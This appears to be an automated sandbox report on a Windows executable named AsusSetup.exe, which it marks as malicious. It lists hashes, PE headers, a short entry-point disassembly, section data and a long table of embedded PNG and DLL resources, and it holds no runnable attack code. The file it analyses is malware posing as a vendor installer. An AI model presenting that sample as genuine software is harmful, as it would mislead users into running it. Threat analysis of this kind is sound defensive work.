                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1434112
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6849522507957255
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:mIyE/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:mInLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:EDB52E00EF5D312A130E3F1D251A21BA
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:B01BC3AAD6EFA0453E1FB5D843A3D4CB7ED150AD
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:35F3679A6BDADA95605CB850AA548F5F9328BC16677DB251E3CE6E64D2EF6DE9
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:28B8B7D5BEDD1BAB0B90FE7F6C95FA2F7F6FE06204027EAE25AE1DEE2E78CDD3DDF795493EC33F41F2ACB4C57624CC9589159480F7B2A0E76960420803D2BD0B
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.953364197222141
                                                                                                                                                                                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Win64 Executable GUI (202006/5) 60.38%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Windows ActiveX control (116523/4) 34.83%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Win64 Executable (generic) (12005/4) 3.59%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.60%
                                                                                                                                                                                                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.60%
                                                                                                                                                                                                                                                                                                                                                                                                                  File name:AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File size:5'251'072 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:13bf2819401d2f983fff90c1960831b8
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:0b8058088b47edbcf963ac2ac7d5b23fa35e0e90
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256:7db9ca7dbe9a5724ef452585280e73a1a73563cc6a2559f2588d613454f70261
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512:af83b681f62582e9cbf983f6e5e1ba32c3a6ccd7896c644d77a5d5d76b2ca24af85deb6ea6621a0b29e15ab7637ba9f9606b09fb56387461604c38d8ca85502f
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:98304:pmuSFdw5ujhEMdcbJFLOAkGkzdnEVomFHKnPV7wRGpj3:ChKMdcNFLOyomFHKnPpF9
                                                                                                                                                                                                                                                                                                                                                                                                                  TLSH:FE36BF4AAFEC40E8D4A6D035C96B895BD7B6BC601631878F1064775F6F333918E2E326
                                                                                                                                                                                                                                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................................c.............................................................................m.............Rich...
                                                                                                                                                                                                                                                                                                                                                                                                                  Icon Hash:57171d4de7912e31
                                                                                                                                                                                                                                                                                                                                                                                                                  Entrypoint:0x1401cacb4
                                                                                                                                                                                                                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                                                                                                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                                                                                                                                                                                                  DLL Characteristics:HIGH_ENTROPY_VA, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                                                                                                                                  Time Stamp:0x61615653 [Sat Oct 9 08:44:03 2021 UTC]
                                                                                                                                                                                                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                                                                                                                                  OS Version Major:6
                                                                                                                                                                                                                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                                                                                                                                                                                                                  File Version Major:6
                                                                                                                                                                                                                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                                                                                                                                                                                                                  Subsystem Version Major:6
                                                                                                                                                                                                                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                                                                                                                                  Import Hash:624b40321b3d0fd2a008a7271554dd30
                                                                                                                                                                                                                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                                                                                                                                                  sub esp, 28h
                                                                                                                                                                                                                                                                                                                                                                                                                  call 00007FD1D125307Ch
                                                                                                                                                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                                                                                                                                                  add esp, 28h
                                                                                                                                                                                                                                                                                                                                                                                                                  jmp 00007FD1D12522BFh
                                                                                                                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                                                                                                                  int3
int3
int3
int3
int3
nop word ptr [eax+eax+00000000h]
dec eax
cmp ecx, dword ptr [000EFBD9h]
jne 00007FD1D1252455h
dec eax
rol ecx, 10h
test cx, FFFFh
jne 00007FD1D1252445h
ret
dec eax
ror ecx, 10h
jmp 00007FD1D1252AA4h
int3
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
dec eax
lea eax, dword ptr [000976C7h]
dec eax
mov ebx, ecx
dec eax
mov dword ptr [ecx], eax
test dl, 00000001h
je 00007FD1D125244Ch
mov edx, 00000018h
call 00007FD1D108B05Fh
dec eax
mov eax, ebx
dec eax
add esp, 20h
pop ebx
ret
int3
inc eax
push edi
dec eax
sub esp, 30h
dec eax
mov dword ptr [esp+20h], FFFFFFFEh
dec eax
mov dword ptr [esp+40h], ebx
dec eax
mov dword ptr [esp+48h], esi
mov edx, 00000FA0h
dec eax
lea ecx, dword ptr [000FC48Bh]
call dword ptr [0003AA55h]
nop
dec eax
lea ecx, dword ptr [000976ADh]
call dword ptr [0003AB1Fh]
nop
dec eax
mov ebx, eax
dec eax
test eax, eax
jne 00007FD1D125245Ch
dec eax
lea ecx, dword ptr [000409FFh]
call dword ptr [00000009h]
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x2b4650         0x1a4         .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x2e1000         0x18ced0      .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x2c9000         0x17ef8       .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x276a40         0x70          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x276bb0         0x28          .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x276ab0         0x100         .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x205000         0x1598        .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x203a84 | 0x203c00 | 55b33a0057eb1249062d404be6f3c191 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x205000 | 0xb3d38 | 0xb3e00 | ff7e3f5077be3fcdc08c5cefe3b61d4c | False | 0.2822516721681723 | data | 4.503762467408248 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x2b9000 | 0xff28 | 0x8200 | 2f1ce6f3cad070fb35415b8819bef07c | False | 0.19435096153846154 | DIY-Thermocam raw data (Lepton 2.x), scale -10205-9792, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 214.254868 | 4.149010331740686 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x2c9000 | 0x17ef8 | 0x18000 | 8bf150e7a62f97a619c3cdc82be98ce0 | False | 0.5033976236979166 | data | 6.127219429376976 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x2e1000 | 0x18ced0 | 0x18d000 | 9c8c5f222f38bacdf70cf40cfe0a5854 | False | 0.5891008737405542 | data | 7.435885059265607 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x46e000 | 0x9e000 | 0x9d000 | 0a7ec46257812d1e3d4161a390673ed1 | False | 0.8984857061106688 | data | 7.909171977386322 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
DLL | 0x2f5928 | 0x1b600 | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows | English | United States | 0.4680543664383562
DLL | 0x310f28 | 0x1de00 | PE32+ executable (DLL) (GUI) x86-64, for MS Windows | English | United States | 0.46928118462343094
PNG | 0x338d08 | 0x77 | PNG image data, 4 x 4, 8-bit/color RGB, non-interlaced | English | United States | 0.9915966386554622
PNG | 0x335648 | 0x2f5 | PNG image data, 70 x 23, 8-bit/color RGBA, non-interlaced | English | United States | 1.0145310435931307
PNG | 0x335bc8 | 0x301 | PNG image data, 70 x 31, 8-bit/color RGBA, non-interlaced | English | United States | 1.0143042912873863
PNG | 0x335940 | 0x287 | PNG image data, 70 x 23, 8-bit/color RGBA, non-interlaced | English | United States | 1.017001545595054
PNG | 0x3385b8 | 0x36e | PNG image data, 22 x 40, 8-bit/color RGB, non-interlaced | English | United States | 1.0125284738041003
PNG | 0x3374d0 | 0x15d | PNG image data, 55 x 22, 8-bit/color RGBA, non-interlaced | English | United States | 1.0315186246418337
PNG | 0x337630 | 0x13e | PNG image data, 55 x 22, 8-bit/color RGBA, non-interlaced | English | United States | 1.0345911949685536
PNG | 0x337770 | 0x115 | PNG image data, 30 x 24, 8-bit/color RGB, non-interlaced | English | United States | 1.03971119133574
PNG | 0x337888 | 0x12a | PNG image data, 20 x 40, 8-bit/color RGBA, non-interlaced | English | United States | 1.0302013422818792
PNG | 0x3372c0 | 0x20c | PNG image data, 10 x 28, 8-bit/color RGB, non-interlaced | English | United States | 1.0209923664122138
PNG | 0x338c08 | 0xfd | PNG image data, 10 x 28, 8-bit/color RGB, non-interlaced | English | United States | 1.0276679841897234
PNG | 0x338928 | 0xa6 | PNG image data, 7 x 7, 8-bit/color RGB, non-interlaced | English | United States | 1.0120481927710843
PNG | 0x3389d0 | 0x7c | PNG image data, 3 x 11, 8-bit/color RGBA, non-interlaced | English | United States | 0.9919354838709677
PNG | 0x338a50 | 0x96 | PNG image data, 9 x 8, 8-bit/color RGB, non-interlaced | English | United States | 1.0133333333333334
PNG | 0x338ae8 | 0x91 | PNG image data, 9 x 8, 8-bit/color RGB, non-interlaced | English | United States | 1.006896551724138
PNG | 0x338b80 | 0x84 | PNG image data, 15 x 3, 8-bit/color RGB, non-interlaced | English | United States | 0.9848484848484849
PNG | 0x34c7d0 | 0xa3 | PNG image data, 7 x 7, 8-bit/color RGB, non-interlaced | English | United States | 1.0122699386503067
PNG | 0x348218 | 0x771 | PNG image data, 13 x 156, 8-bit/color RGB, non-interlaced | English | United States | 1.005774278215223
PNG | 0x342bb8 | 0x697 | PNG image data, 52 x 268, 8-bit/color RGBA, non-interlaced | English | United States | 1.006520450503853
PNG | 0x343250 | 0x342 | PNG image data, 30 x 16, 8-bit/color RGBA, non-interlaced | English | United States | 1.013189448441247
PNG | 0x34c370 | 0x45f | PNG image data, 24 x 72, 8-bit/color RGB, non-interlaced | English | United States | 1.0098302055406614
PNG | 0x348b60 | 0x1a3 | PNG image data, 20 x 12, 8-bit/color RGBA, non-interlaced | English | United States | 1.026252983293556
PNG | 0x345720 | 0xac8 | PNG image data, 24 x 132, 8-bit/color RGBA, non-interlaced | English | United States | 1.0039855072463768
PNG | 0x3461e8 | 0x37c | PNG image data, 8 x 88, 8-bit/color RGBA, non-interlaced | English | United States | 1.0123318385650224
PNG | 0x347338 | 0xa50 | PNG image data, 24 x 132, 8-bit/color RGBA, non-interlaced | English | United States | 1.0041666666666667
PNG | 0x347d88 | 0x48e | PNG image data, 9 x 88, 8-bit/color RGBA, non-interlaced | English | United States | 1.009433962264151
PNG | 0x346568 | 0xa50 | PNG image data, 24 x 132, 8-bit/color RGBA, non-interlaced | English | United States | 1.0041666666666667
PNG | 0x346fb8 | 0x380 | PNG image data, 8 x 88, 8-bit/color RGBA, non-interlaced | English | United States | 1.0122767857142858
PNG | 0x33da70 | 0xab0 | PNG image data, 22 x 110, 8-bit/color RGBA, non-interlaced | English | United States | 1.0040204678362572
PNG | 0x33efb0 | 0xb1f | PNG image data, 22 x 110, 8-bit/color RGBA, non-interlaced | English | United States | 1.0038637161924833
PNG | 0x33e520 | 0xa8e | PNG image data, 22 x 110, 8-bit/color RGBA, non-interlaced | English | United States | 1.0040710584752035
PNG | 0x33fad0 | 0xb30 | PNG image data, 22 x 110, 8-bit/color RGBA, non-interlaced | English | United States | 1.003840782122905
PNG | 0x3416f0 | 0x3a6 | PNG image data, 48 x 12, 8-bit/color RGBA, non-interlaced | English | United States | 1.011777301927195
PNG | 0x341a98 | 0x111b | PNG image data, 38 x 114, 8-bit/color RGBA, non-interlaced | English | United States | 1.0025119890385932
PNG | 0x343e60 | 0x3d1 | PNG image data, 23 x 110, 8-bit/color RGBA, non-interlaced | English | United States | 1.0112589559877174
PNG | 0x344238 | 0x21b | PNG image data, 11 x 88, 8-bit/color RGB, non-interlaced | English | United States | 1.0204081632653061
PNG | 0x344458 | 0xb12 | PNG image data, 50 x 273, 8-bit/color RGBA, non-interlaced | English | United States | 1.003881439661256
PNG | 0x344f70 | 0x7ac | PNG image data, 50 x 162, 8-bit/color RGBA, non-interlaced | English | United States | 1.005600814663951
PNG | 0x3409a8 | 0xd43 | PNG image data, 50 x 264, 8-bit/color RGB, non-interlaced | English | United States | 1.003240058910162
PNG | 0x340600 | 0x3a4 | PNG image data, 22 x 88, 8-bit/color RGBA, non-interlaced | English | United States | 1.011802575107296
PNG | 0x34c930 | 0x320 | PNG image data, 14 x 246, 8-bit/color RGBA, non-interlaced | English | United States | 1.01375
PNG | 0x34cc50 | 0x31f | PNG image data, 14 x 246, 8-bit/color RGBA, non-interlaced | English | United States | 1.0137672090112642
PNG | 0x349250 | 0x2bd | PNG image data, 15 x 80, 8-bit/color RGBA, non-interlaced | English | United States | 1.0156918687589158
PNG | 0x348fd8 | 0x273 | PNG image data, 15 x 76, 8-bit/color RGBA, non-interlaced | English | United States | 1.0175438596491229
PNG | 0x348d08 | 0x2c9 | PNG image data, 15 x 84, 8-bit/color RGBA, non-interlaced | English | United States | 1.0154277699859748
PNG | 0x3489f8 | 0x163 | PNG image data, 70 x 66, 8-bit/color RGBA, non-interlaced | English | United States | 1.0112676056338028
PNG | 0x349510 | 0x152 | PNG image data, 41 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.032544378698225
PNG | 0x343598 | 0x38a | PNG image data, 64 x 26, 8-bit/color RGBA, non-interlaced | English | United States | 1.0121412803532008
PNG | 0x343928 | 0x532 | PNG image data, 64 x 26, 8-bit/color RGBA, non-interlaced | English | United States | 1.0082706766917293
PNG | 0x33b2f8 | 0x19c | PNG image data, 80 x 92, 8-bit/color RGBA, non-interlaced | English | United States | 0.8810679611650486
PNG | 0x33b498 | 0x2296 | PNG image data, 72 x 125, 8-bit/color RGBA, non-interlaced | English | United States | 1.001242376327084
PNG | 0x359910 | 0x69e | PNG image data, 52 x 268, 8-bit/color RGBA, non-interlaced | English | United States | 1.0064935064935066
PNG | 0x35c950 | 0x1c4 | PNG image data, 80 x 92, 8-bit/color RGBA, non-interlaced | English | United States | 0.8252212389380531
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x35c4280x522PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.008371385083714
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x359fb00x2475PNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.000750026786671
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3566c80x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3597480x1c3PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8314855875831486
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3592400x505PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0085603112840467
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x356d680x24d3PNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0004243131430997
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x35cb180x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x35fbe00x1c7PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.832967032967033
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x35f6a80x536PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082458770614693
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x35d1b80x24f0PNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0011632825719121
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3504880x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3533e00x1c5PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8388520971302428
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x352f000x4d9PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.008863819500403
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x350b280x23d3PNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x34cf700x189PNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0279898218829517
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x34d1000x1bcPNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States0.7027027027027027
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x34d3880x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3502c00x1c4PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.827433628318584
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x34fdd00x4efPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0087094220110848
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x34da280x23a2PNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0007673755755317
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x34d2c00xc5PNG image data, 3 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0253807106598984
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x35fda80x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x362e400x1baPNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8212669683257918
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3629580x4e4PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0087859424920127
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3604480x250fPNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0005270369979973
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3535a80x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3565000x1c2PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8288888888888889
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3560100x4e9PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0087509944311854
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x353c480x23c6PNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.000436776588775
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x34c8780xb5PNG image data, 15 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0165745856353592
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x33d8e80x186PNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.028205128205128
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x33d7300x1b5PNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States0.6864988558352403
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3489900x66PNG image data, 1 x 46, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9803921568627451
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x34a7a80xf9PNG image data, 90 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0321285140562249
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x34aba80x17c3PNG image data, 86 x 240, 8-bit/color RGBA, non-interlacedEnglishUnited States0.992931119513398
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x34a8a80x283PNG image data, 86 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0171073094867806
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x34ab300x71PNG image data, 5 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9823008849557522
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x34a0880x71dPNG image data, 16 x 48, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0060406370126305
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3498f00x794PNG image data, 16 x 48, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0056701030927835
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3496680x284PNG image data, 7 x 39, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0170807453416149
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x335ed00x203PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.021359223300971
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3360d80x1b5PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0251716247139588
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3363680xb2PNG image data, 2 x 20, 8-bit/color RGB, non-interlacedEnglishUnited States1.0168539325842696
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3362900xd1PNG image data, 11 x 11, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9760765550239234
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3364200x21cPNG image data, 21 x 42, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0203703703703704
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3366400x21cPNG image data, 21 x 42, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0203703703703704
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3368600x1aePNG image data, 21 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0186046511627906
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x336a100x13aPNG image data, 16 x 56, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0222929936305734
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x336cf80x13fPNG image data, 21 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0344827586206897
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x336e380x135PNG image data, 16 x 56, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9967637540453075
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x336b500xdbPNG image data, 21 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0228310502283104
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x336c300xc6PNG image data, 16 x 56, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0252525252525253
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x336f700x1a9PNG image data, 21 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0141176470588236
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3371200x19bPNG image data, 16 x 56, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0194647201946472
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x338f200x2296PNG image data, 72 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.001242376327084
PNG | 0x33b1b8 | 0x13e | PNG image data, 72 x 15, 8-bit/color RGB, non-interlaced | English | United States | 1.0345911949685536
PNG | 0x338e08 | 0x115 | PNG image data, 30 x 24, 8-bit/color RGB, non-interlaced | English | United States | 1.03971119133574
PNG | 0x338d80 | 0x83 | PNG image data, 35 x 3, 8-bit/color RGB, non-interlaced | English | United States | 1.0076335877862594
PNG | 0x3384e8 | 0xce | PNG image data, 7 x 7, 8-bit/color RGB, non-interlaced | English | United States | 1.0242718446601942
PNG | 0x3379b8 | 0xb30 | PNG image data, 22 x 110, 8-bit/color RGBA, non-interlaced | English | United States | 1.003840782122905
PNG | 0x36b470 | 0x25f | PNG image data, 72 x 22, 8-bit/color RGBA, non-interlaced | English | United States | 1.0181219110378912
PNG | 0x36b258 | 0x79 | PNG image data, 4 x 4, 8-bit/color RGB, non-interlaced | English | United States | 0.9752066115702479
PNG | 0x367b10 | 0x170 | PNG image data, 70 x 23, 8-bit/color RGBA, non-interlaced | English | United States | 0.9755434782608695
PNG | 0x367d88 | 0x26b | PNG image data, 70 x 31, 8-bit/color RGBA, non-interlaced | English | United States | 1.0177705977382876
PNG | 0x367c80 | 0x105 | PNG image data, 70 x 23, 8-bit/color RGBA, non-interlaced | English | United States | 0.9731800766283525
PNG | 0x36ad88 | 0xe6 | PNG image data, 22 x 38, 8-bit/color RGB, non-interlaced | English | United States | 1.0260869565217392
PNG | 0x369ed0 | 0x38d | PNG image data, 55 x 22, 8-bit/color RGBA, non-interlaced | English | United States | 1.012101210121012
PNG | 0x36a260 | 0x265 | PNG image data, 55 x 22, 8-bit/color RGBA, non-interlaced | English | United States | 1.0179445350734095
PNG | 0x36a578 | 0x11a | PNG image data, 30 x 24, 8-bit/color RGBA, non-interlaced | English | United States | 1.0319148936170213
PNG | 0x36a4c8 | 0xaa | PNG image data, 2 x 19, 8-bit/color RGB, non-interlaced | English | United States | 1.011764705882353
PNG | 0x36a698 | 0x12a | PNG image data, 20 x 40, 8-bit/color RGBA, non-interlaced | English | United States | 1.0268456375838926
PNG | 0x369cc0 | 0x209 | PNG image data, 10 x 28, 8-bit/color RGB, non-interlaced | English | United States | 1.021113243761996
PNG | 0x36b160 | 0xf5 | PNG image data, 10 x 28, 8-bit/color RGB, non-interlaced | English | United States | 1.0244897959183674
PNG | 0x36c720 | 0xa6 | PNG image data, 54 x 31, 8-bit/color RGB, non-interlaced | English | United States | 1.0180722891566265
PNG | 0x36c5d0 | 0x150 | PNG image data, 54 x 124, 8-bit/color RGB, non-interlaced | English | United States | 1.0327380952380953
PNG | 0x36ae70 | 0xac | PNG image data, 7 x 7, 8-bit/color RGBA, non-interlaced | English | United States | 1.0174418604651163
PNG | 0x36af20 | 0x89 | PNG image data, 3 x 11, 8-bit/color RGBA, non-interlaced | English | United States | 1.0
PNG | 0x36afb0 | 0x98 | PNG image data, 9 x 8, 8-bit/color RGB, non-interlaced | English | United States | 1.006578947368421
